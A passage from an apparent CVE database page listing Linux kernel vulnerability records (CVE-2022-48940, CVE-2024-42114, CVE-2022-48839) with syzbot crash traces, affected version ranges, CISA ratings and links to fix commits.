__pv_queued_spin_lock_slowpath+0x32b/0x520\n[ 16.042040] __pv_queued_spin_lock_slowpath+0x32b/0x520\n[ 16.042328] ? memcpy+0x39/0x60\n[ 16.042552] ? pv_hash+0xd0/0xd0\n[ 16.042785] ? lockdep_hardirqs_off+0x95/0xd0\n[ 16.043079] __bpf_spin_lock_irqsave+0xdf/0xf0\n[ 16.043366] ? bpf_get_current_comm+0x50/0x50\n[ 16.043608] ? jhash+0x11a/0x270\n[ 16.043848] bpf_timer_cancel+0x34/0xe0\n[ 16.044119] bpf_prog_c4ea1c0f7449940d_sys_enter+0x7c/0x81\n[ 16.044500] bpf_trampoline_6442477838_0+0x36/0x1000\n[ 16.044836] __x64_sys_nanosleep+0x5/0x140\n[ 16.045119] do_syscall_64+0x59/0x80\n[ 16.045377] ? lock_is_held_type+0xe4/0x140\n[ 16.045670] ? irqentry_exit_to_user_mode+0xa/0x40\n[ 16.046001] ? mark_held_locks+0x24/0x90\n[ 16.046287] ? asm_exc_page_fault+0x1e/0x30\n[ 16.046569] ? asm_exc_page_fault+0x8/0x30\n[ 16.046851] ? lockdep_hardirqs_on+0x7e/0x100\n[ 16.047137] entry_SYSCALL_64_after_hwframe+0x44/0xae\n[ 16.047405] RIP: 0033:0x7f9e4831718d\n[ 16.047602] Code: b4 0c 00 0f 05 eb a9 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 \u003c48\u003e 3d 01 f0 ff ff 73 01 c3 48 8b 0d b3 6c 0c 00 f7 d8 64 89 01 48\n[ 16.048764] RSP: 002b:00007fff488086b8 EFLAGS: 00000206 ORIG_RAX: 0000000000000023\n[ 16.049275] RAX: ffffffffffffffda RBX: 00007f9e48683740 RCX: 00007f9e4831718d\n[ 16.049747] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 00007fff488086d0\n[ 16.050225] RBP: 00007fff488086f0 R08: 00007fff488085d7 R09: 00007f9e4cb594a0\n[ 16.050648] R10: 0000000000000000 R11: 0000000000000206 R12: 00007f9e484cde30\n[ 16.051124] R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000\n[ 16.051608] \u003c/TASK\u003e\n[ 16.051762] =================================================================="
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:26:34.156Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/719d1c2524c89ada78c4c9202641c1d9e942a322"
},
{
"url": "https://git.kernel.org/stable/c/eca9bd215d2233de79d930fa97aefbce03247a98"
},
{
"url": "https://git.kernel.org/stable/c/a8abb0c3dc1e28454851a00f8b7333d9695d566c"
}
],
"title": "bpf: Fix crash due to incorrect copy_map_value",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2022-48940",
"datePublished": "2024-08-22T03:31:35.844Z",
"dateReserved": "2024-08-22T01:27:53.623Z",
"dateUpdated": "2025-05-04T08:26:34.156Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42114 (GCVE-0-2024-42114)
Vulnerability from cvelistv5
Published
2024-07-30 07:46
Modified
2025-05-04 09:23
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
wifi: cfg80211: restrict NL80211_ATTR_TXQ_QUANTUM values
syzbot is able to trigger softlockups, setting NL80211_ATTR_TXQ_QUANTUM
to 2^31.
We had a similar issue in sch_fq, fixed with commit
d9e15a273306 ("pkt_sched: fq: do not accept silly TCA_FQ_QUANTUM")
watchdog: BUG: soft lockup - CPU#1 stuck for 26s! [kworker/1:0:24]
Modules linked in:
irq event stamp: 131135
hardirqs last enabled at (131134): [<ffff80008ae8778c>] __exit_to_kernel_mode arch/arm64/kernel/entry-common.c:85 [inline]
hardirqs last enabled at (131134): [<ffff80008ae8778c>] exit_to_kernel_mode+0xdc/0x10c arch/arm64/kernel/entry-common.c:95
hardirqs last disabled at (131135): [<ffff80008ae85378>] __el1_irq arch/arm64/kernel/entry-common.c:533 [inline]
hardirqs last disabled at (131135): [<ffff80008ae85378>] el1_interrupt+0x24/0x68 arch/arm64/kernel/entry-common.c:551
softirqs last enabled at (125892): [<ffff80008907e82c>] neigh_hh_init net/core/neighbour.c:1538 [inline]
softirqs last enabled at (125892): [<ffff80008907e82c>] neigh_resolve_output+0x268/0x658 net/core/neighbour.c:1553
softirqs last disabled at (125896): [<ffff80008904166c>] local_bh_disable+0x10/0x34 include/linux/bottom_half.h:19
CPU: 1 PID: 24 Comm: kworker/1:0 Not tainted 6.9.0-rc7-syzkaller-gfda5695d692c #0
Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 03/27/2024
Workqueue: mld mld_ifc_work
pstate: 80400005 (Nzcv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--)
pc : __list_del include/linux/list.h:195 [inline]
pc : __list_del_entry include/linux/list.h:218 [inline]
pc : list_move_tail include/linux/list.h:310 [inline]
pc : fq_tin_dequeue include/net/fq_impl.h:112 [inline]
pc : ieee80211_tx_dequeue+0x6b8/0x3b4c net/mac80211/tx.c:3854
lr : __list_del_entry include/linux/list.h:218 [inline]
lr : list_move_tail include/linux/list.h:310 [inline]
lr : fq_tin_dequeue include/net/fq_impl.h:112 [inline]
lr : ieee80211_tx_dequeue+0x67c/0x3b4c net/mac80211/tx.c:3854
sp : ffff800093d36700
x29: ffff800093d36a60 x28: ffff800093d36960 x27: dfff800000000000
x26: ffff0000d800ad50 x25: ffff0000d800abe0 x24: ffff0000d800abf0
x23: ffff0000e0032468 x22: ffff0000e00324d4 x21: ffff0000d800abf0
x20: ffff0000d800abf8 x19: ffff0000d800abf0 x18: ffff800093d363c0
x17: 000000000000d476 x16: ffff8000805519dc x15: ffff7000127a6cc8
x14: 1ffff000127a6cc8 x13: 0000000000000004 x12: ffffffffffffffff
x11: ffff7000127a6cc8 x10: 0000000000ff0100 x9 : 0000000000000000
x8 : 0000000000000000 x7 : 0000000000000000 x6 : 0000000000000000
x5 : ffff80009287aa08 x4 : 0000000000000008 x3 : ffff80008034c7fc
x2 : ffff0000e0032468 x1 : 00000000da0e46b8 x0 : ffff0000e0032470
Call trace:
__list_del include/linux/list.h:195 [inline]
__list_del_entry include/linux/list.h:218 [inline]
list_move_tail include/linux/list.h:310 [inline]
fq_tin_dequeue include/net/fq_impl.h:112 [inline]
ieee80211_tx_dequeue+0x6b8/0x3b4c net/mac80211/tx.c:3854
wake_tx_push_queue net/mac80211/util.c:294 [inline]
ieee80211_handle_wake_tx_queue+0x118/0x274 net/mac80211/util.c:315
drv_wake_tx_queue net/mac80211/driver-ops.h:1350 [inline]
schedule_and_wake_txq net/mac80211/driver-ops.h:1357 [inline]
ieee80211_queue_skb+0x18e8/0x2244 net/mac80211/tx.c:1664
ieee80211_tx+0x260/0x400 net/mac80211/tx.c:1966
ieee80211_xmit+0x278/0x354 net/mac80211/tx.c:2062
__ieee80211_subif_start_xmit+0xab8/0x122c net/mac80211/tx.c:4338
ieee80211_subif_start_xmit+0xe0/0x438 net/mac80211/tx.c:4532
__netdev_start_xmit include/linux/netdevice.h:4903 [inline]
netdev_start_xmit include/linux/netdevice.h:4917 [inline]
xmit_one net/core/dev.c:3531 [inline]
dev_hard_start_xmit+0x27c/0x938 net/core/dev.c:3547
__dev_queue_xmit+0x1678/0x33fc net/core/dev.c:4341
dev_queue_xmit include/linux/netdevice.h:3091 [inline]
neigh_resolve_output+0x558/0x658 net/core/neighbour.c:1563
neigh_output include/net/neighbour.h:542 [inline]
ip6_fini
---truncated---
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 52539ca89f365d3db530535fbffa88a3cca4d2ec Version: 52539ca89f365d3db530535fbffa88a3cca4d2ec Version: 52539ca89f365d3db530535fbffa88a3cca4d2ec Version: 52539ca89f365d3db530535fbffa88a3cca4d2ec Version: 52539ca89f365d3db530535fbffa88a3cca4d2ec Version: 52539ca89f365d3db530535fbffa88a3cca4d2ec |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:54:32.578Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e87c2f098f52aa2fe20258a5bb1738d6a74e9ed7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d1cba2ea8121e7fdbe1328cea782876b1dd80993"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42114",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:17:20.245237Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:06.151Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/wireless/nl80211.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "80ac0cc9c0bef984e29637b1efa93d7214b42f53",
"status": "affected",
"version": "52539ca89f365d3db530535fbffa88a3cca4d2ec",
"versionType": "git"
},
{
"lessThan": "33ac5a4eb3d4bea2146658f1b6d1fa86d62d2b22",
"status": "affected",
"version": "52539ca89f365d3db530535fbffa88a3cca4d2ec",
"versionType": "git"
},
{
"lessThan": "3fc06f6d142d2840735543216a60d0a8c345bdec",
"status": "affected",
"version": "52539ca89f365d3db530535fbffa88a3cca4d2ec",
"versionType": "git"
},
{
"lessThan": "8a3ac7fb36962c34698f884bd697938054ff2afa",
"status": "affected",
"version": "52539ca89f365d3db530535fbffa88a3cca4d2ec",
"versionType": "git"
},
{
"lessThan": "e87c2f098f52aa2fe20258a5bb1738d6a74e9ed7",
"status": "affected",
"version": "52539ca89f365d3db530535fbffa88a3cca4d2ec",
"versionType": "git"
},
{
"lessThan": "d1cba2ea8121e7fdbe1328cea782876b1dd80993",
"status": "affected",
"version": "52539ca89f365d3db530535fbffa88a3cca4d2ec",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/wireless/nl80211.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.18"
},
{
"lessThan": "4.18",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.224",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.165",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.106",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.47",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.9",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.224",
"versionStartIncluding": "4.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.165",
"versionStartIncluding": "4.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.106",
"versionStartIncluding": "4.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.47",
"versionStartIncluding": "4.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.9",
"versionStartIncluding": "4.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "4.18",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: cfg80211: restrict NL80211_ATTR_TXQ_QUANTUM values\n\nsyzbot is able to trigger softlockups, setting NL80211_ATTR_TXQ_QUANTUM\nto 2^31.\n\nWe had a similar issue in sch_fq, fixed with commit\nd9e15a273306 (\"pkt_sched: fq: do not accept silly TCA_FQ_QUANTUM\")\n\nwatchdog: BUG: soft lockup - CPU#1 stuck for 26s! [kworker/1:0:24]\nModules linked in:\nirq event stamp: 131135\n hardirqs last enabled at (131134): [\u003cffff80008ae8778c\u003e] __exit_to_kernel_mode arch/arm64/kernel/entry-common.c:85 [inline]\n hardirqs last enabled at (131134): [\u003cffff80008ae8778c\u003e] exit_to_kernel_mode+0xdc/0x10c arch/arm64/kernel/entry-common.c:95\n hardirqs last disabled at (131135): [\u003cffff80008ae85378\u003e] __el1_irq arch/arm64/kernel/entry-common.c:533 [inline]\n hardirqs last disabled at (131135): [\u003cffff80008ae85378\u003e] el1_interrupt+0x24/0x68 arch/arm64/kernel/entry-common.c:551\n softirqs last enabled at (125892): [\u003cffff80008907e82c\u003e] neigh_hh_init net/core/neighbour.c:1538 [inline]\n softirqs last enabled at (125892): [\u003cffff80008907e82c\u003e] neigh_resolve_output+0x268/0x658 net/core/neighbour.c:1553\n softirqs last disabled at (125896): [\u003cffff80008904166c\u003e] local_bh_disable+0x10/0x34 include/linux/bottom_half.h:19\nCPU: 1 PID: 24 Comm: kworker/1:0 Not tainted 6.9.0-rc7-syzkaller-gfda5695d692c #0\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 03/27/2024\nWorkqueue: mld mld_ifc_work\npstate: 80400005 (Nzcv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--)\n pc : __list_del include/linux/list.h:195 [inline]\n pc : __list_del_entry include/linux/list.h:218 [inline]\n pc : list_move_tail include/linux/list.h:310 [inline]\n pc : fq_tin_dequeue include/net/fq_impl.h:112 [inline]\n pc : ieee80211_tx_dequeue+0x6b8/0x3b4c net/mac80211/tx.c:3854\n lr : __list_del_entry include/linux/list.h:218 [inline]\n lr : list_move_tail include/linux/list.h:310 [inline]\n lr : fq_tin_dequeue include/net/fq_impl.h:112 [inline]\n lr : ieee80211_tx_dequeue+0x67c/0x3b4c net/mac80211/tx.c:3854\nsp : ffff800093d36700\nx29: ffff800093d36a60 x28: ffff800093d36960 x27: dfff800000000000\nx26: ffff0000d800ad50 x25: ffff0000d800abe0 x24: ffff0000d800abf0\nx23: ffff0000e0032468 x22: ffff0000e00324d4 x21: ffff0000d800abf0\nx20: ffff0000d800abf8 x19: ffff0000d800abf0 x18: ffff800093d363c0\nx17: 000000000000d476 x16: ffff8000805519dc x15: ffff7000127a6cc8\nx14: 1ffff000127a6cc8 x13: 0000000000000004 x12: ffffffffffffffff\nx11: ffff7000127a6cc8 x10: 0000000000ff0100 x9 : 0000000000000000\nx8 : 0000000000000000 x7 : 0000000000000000 x6 : 0000000000000000\nx5 : ffff80009287aa08 x4 : 0000000000000008 x3 : ffff80008034c7fc\nx2 : ffff0000e0032468 x1 : 00000000da0e46b8 x0 : ffff0000e0032470\nCall trace:\n __list_del include/linux/list.h:195 [inline]\n __list_del_entry include/linux/list.h:218 [inline]\n list_move_tail include/linux/list.h:310 [inline]\n fq_tin_dequeue include/net/fq_impl.h:112 [inline]\n ieee80211_tx_dequeue+0x6b8/0x3b4c net/mac80211/tx.c:3854\n wake_tx_push_queue net/mac80211/util.c:294 [inline]\n ieee80211_handle_wake_tx_queue+0x118/0x274 net/mac80211/util.c:315\n drv_wake_tx_queue net/mac80211/driver-ops.h:1350 [inline]\n schedule_and_wake_txq net/mac80211/driver-ops.h:1357 [inline]\n ieee80211_queue_skb+0x18e8/0x2244 net/mac80211/tx.c:1664\n ieee80211_tx+0x260/0x400 net/mac80211/tx.c:1966\n ieee80211_xmit+0x278/0x354 net/mac80211/tx.c:2062\n __ieee80211_subif_start_xmit+0xab8/0x122c net/mac80211/tx.c:4338\n ieee80211_subif_start_xmit+0xe0/0x438 net/mac80211/tx.c:4532\n __netdev_start_xmit include/linux/netdevice.h:4903 [inline]\n netdev_start_xmit include/linux/netdevice.h:4917 [inline]\n xmit_one net/core/dev.c:3531 [inline]\n dev_hard_start_xmit+0x27c/0x938 net/core/dev.c:3547\n __dev_queue_xmit+0x1678/0x33fc net/core/dev.c:4341\n dev_queue_xmit include/linux/netdevice.h:3091 [inline]\n neigh_resolve_output+0x558/0x658 net/core/neighbour.c:1563\n neigh_output include/net/neighbour.h:542 [inline]\n ip6_fini\n---truncated---"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:23:18.984Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/80ac0cc9c0bef984e29637b1efa93d7214b42f53"
},
{
"url": "https://git.kernel.org/stable/c/33ac5a4eb3d4bea2146658f1b6d1fa86d62d2b22"
},
{
"url": "https://git.kernel.org/stable/c/3fc06f6d142d2840735543216a60d0a8c345bdec"
},
{
"url": "https://git.kernel.org/stable/c/8a3ac7fb36962c34698f884bd697938054ff2afa"
},
{
"url": "https://git.kernel.org/stable/c/e87c2f098f52aa2fe20258a5bb1738d6a74e9ed7"
},
{
"url": "https://git.kernel.org/stable/c/d1cba2ea8121e7fdbe1328cea782876b1dd80993"
}
],
"title": "wifi: cfg80211: restrict NL80211_ATTR_TXQ_QUANTUM values",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42114",
"datePublished": "2024-07-30T07:46:07.596Z",
"dateReserved": "2024-07-29T15:50:41.178Z",
"dateUpdated": "2025-05-04T09:23:18.984Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-48839 (GCVE-0-2022-48839)
Vulnerability from cvelistv5
Published
2024-07-16 12:25
Modified
2025-05-04 08:24
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
net/packet: fix slab-out-of-bounds access in packet_recvmsg()
syzbot found that when an AF_PACKET socket is using PACKET_COPY_THRESH
and mmap operations, tpacket_rcv() is queueing skbs with
garbage in skb->cb[], triggering a too big copy [1]
Presumably, users of af_packet using mmap() already gets correct
metadata from the mapped buffer, we can simply make sure
to clear 12 bytes that might be copied to user space later.
BUG: KASAN: stack-out-of-bounds in memcpy include/linux/fortify-string.h:225 [inline]
BUG: KASAN: stack-out-of-bounds in packet_recvmsg+0x56c/0x1150 net/packet/af_packet.c:3489
Write of size 165 at addr ffffc9000385fb78 by task syz-executor233/3631
CPU: 0 PID: 3631 Comm: syz-executor233 Not tainted 5.17.0-rc7-syzkaller-02396-g0b3660695e80 #0
Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 01/01/2011
Call Trace:
<TASK>
__dump_stack lib/dump_stack.c:88 [inline]
dump_stack_lvl+0xcd/0x134 lib/dump_stack.c:106
print_address_description.constprop.0.cold+0xf/0x336 mm/kasan/report.c:255
__kasan_report mm/kasan/report.c:442 [inline]
kasan_report.cold+0x83/0xdf mm/kasan/report.c:459
check_region_inline mm/kasan/generic.c:183 [inline]
kasan_check_range+0x13d/0x180 mm/kasan/generic.c:189
memcpy+0x39/0x60 mm/kasan/shadow.c:66
memcpy include/linux/fortify-string.h:225 [inline]
packet_recvmsg+0x56c/0x1150 net/packet/af_packet.c:3489
sock_recvmsg_nosec net/socket.c:948 [inline]
sock_recvmsg net/socket.c:966 [inline]
sock_recvmsg net/socket.c:962 [inline]
____sys_recvmsg+0x2c4/0x600 net/socket.c:2632
___sys_recvmsg+0x127/0x200 net/socket.c:2674
__sys_recvmsg+0xe2/0x1a0 net/socket.c:2704
do_syscall_x64 arch/x86/entry/common.c:50 [inline]
do_syscall_64+0x35/0xb0 arch/x86/entry/common.c:80
entry_SYSCALL_64_after_hwframe+0x44/0xae
RIP: 0033:0x7fdfd5954c29
Code: 28 00 00 00 75 05 48 83 c4 28 c3 e8 41 15 00 00 90 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 c0 ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007ffcf8e71e48 EFLAGS: 00000246 ORIG_RAX: 000000000000002f
RAX: ffffffffffffffda RBX: 0000000000000003 RCX: 00007fdfd5954c29
RDX: 0000000000000000 RSI: 0000000020000500 RDI: 0000000000000005
RBP: 0000000000000000 R08: 000000000000000d R09: 000000000000000d
R10: 0000000000000000 R11: 0000000000000246 R12: 00007ffcf8e71e60
R13: 00000000000f4240 R14: 000000000000c1ff R15: 00007ffcf8e71e54
</TASK>
addr ffffc9000385fb78 is located in stack of task syz-executor233/3631 at offset 32 in frame:
____sys_recvmsg+0x0/0x600 include/linux/uio.h:246
this frame has 1 object:
[32, 160) 'addr'
Memory state around the buggy address:
ffffc9000385fa80: 00 04 f3 f3 f3 f3 f3 00 00 00 00 00 00 00 00 00
ffffc9000385fb00: 00 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00
>ffffc9000385fb80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f3
^
ffffc9000385fc00: f3 f3 f3 00 00 00 00 00 00 00 00 00 00 00 00 f1
ffffc9000385fc80: f1 f1 f1 00 f2 f2 f2 00 f2 f2 f2 00 00 00 00 00
==================================================================
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 0fb375fb9b93b7d822debc6a734052337ccfdb1f Version: 0fb375fb9b93b7d822debc6a734052337ccfdb1f Version: 0fb375fb9b93b7d822debc6a734052337ccfdb1f Version: 0fb375fb9b93b7d822debc6a734052337ccfdb1f Version: 0fb375fb9b93b7d822debc6a734052337ccfdb1f Version: 0fb375fb9b93b7d822debc6a734052337ccfdb1f Version: 0fb375fb9b93b7d822debc6a734052337ccfdb1f Version: 0fb375fb9b93b7d822debc6a734052337ccfdb1f |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T15:25:01.517Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b9d5772d60f8e7ef34e290f72fc20e3a4883e7d0"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b1e27cda1e3c12b705875bb7e247a97168580e33"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a33dd1e6693f80d805155b3f69c18c2f642915da"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/268dcf1f7b3193bc446ec3d14e08a240e9561e4d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/70b7b3c055fd4a464da8da55ff4c1f84269f9b02"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a055f5f2841f7522b44a2b1eccb1951b4b03d51a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ef591b35176029fdefea38e8388ffa371e18f4b2"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c700525fcc06b05adfea78039de02628af79e07a"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-48839",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:57:00.467657Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:34:10.031Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/packet/af_packet.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "b9d5772d60f8e7ef34e290f72fc20e3a4883e7d0",
"status": "affected",
"version": "0fb375fb9b93b7d822debc6a734052337ccfdb1f",
"versionType": "git"
},
{
"lessThan": "b1e27cda1e3c12b705875bb7e247a97168580e33",
"status": "affected",
"version": "0fb375fb9b93b7d822debc6a734052337ccfdb1f",
"versionType": "git"
},
{
"lessThan": "a33dd1e6693f80d805155b3f69c18c2f642915da",
"status": "affected",
"version": "0fb375fb9b93b7d822debc6a734052337ccfdb1f",
"versionType": "git"
},
{
"lessThan": "268dcf1f7b3193bc446ec3d14e08a240e9561e4d",
"status": "affected",
"version": "0fb375fb9b93b7d822debc6a734052337ccfdb1f",
"versionType": "git"
},
{
"lessThan": "70b7b3c055fd4a464da8da55ff4c1f84269f9b02",
"status": "affected",
"version": "0fb375fb9b93b7d822debc6a734052337ccfdb1f",
"versionType": "git"
},
{
"lessThan": "a055f5f2841f7522b44a2b1eccb1951b4b03d51a",
"status": "affected",
"version": "0fb375fb9b93b7d822debc6a734052337ccfdb1f",
"versionType": "git"
},
{
"lessThan": "ef591b35176029fdefea38e8388ffa371e18f4b2",
"status": "affected",
"version": "0fb375fb9b93b7d822debc6a734052337ccfdb1f",
"versionType": "git"
},
{
"lessThan": "c700525fcc06b05adfea78039de02628af79e07a",
"status": "affected",
"version": "0fb375fb9b93b7d822debc6a734052337ccfdb1f",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/packet/af_packet.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.14"
},
{
"lessThan": "2.6.14",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.9.*",
"status": "unaffected",
"version": "4.9.308",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.14.*",
"status": "unaffected",
"version": "4.14.273",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.236",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.187",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.108",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.31",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.16.*",
"status": "unaffected",
"version": "5.16.17",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "5.17",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.9.308",
"versionStartIncluding": "2.6.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.14.273",
"versionStartIncluding": "2.6.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.236",
"versionStartIncluding": "2.6.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.187",
"versionStartIncluding": "2.6.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.108",
"versionStartIncluding": "2.6.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.31",
"versionStartIncluding": "2.6.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.16.17",
"versionStartIncluding": "2.6.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.17",
"versionStartIncluding": "2.6.14",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
